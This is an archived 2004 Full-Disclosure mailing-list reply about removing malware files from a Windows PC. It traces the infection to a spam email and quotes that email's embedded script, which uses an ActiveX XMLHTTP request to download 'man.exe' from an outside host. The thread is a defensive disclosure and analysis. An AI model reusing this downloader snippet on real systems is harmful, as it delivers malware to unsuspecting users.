|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-Disclosure] Removal?
From: Anders (CNQQTROVMYSY
spammotel.com)
Date: Wed Feb 04 2004 - 02:41:58 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,
> Then you should be able to remove the files. I would also check the
> registry for entries. You can use Ctrl F to search for the file names
> "usr_crt.dll" and "faq.exe" in the registry and remove them. Then reboot,
> and you should be able to remove them.
>>
>> Norton is fully patched to current as is windows update.
>>
> Any idea how this got on your computer?
It was installed by the "man.exe" he spoke of in an earlier post...
(three hours before his first "Removal?" post)
----------
From: axid3j1al axid3j1al <axid3j1alhotmail.com>
Subject: [Full-Disclosure] Old Hack?
> Has anyone see this little code injection hack.
> Is this old?
> Email has subject line "congranulations! you won $1169"
> with body
> http://sinaraevent.com/bbs/zipcode/6.htm
> and code
> <textarea id="code" style="display:none;">
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0);
> x.Send();
----------
.....
Best regards,
Anders
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]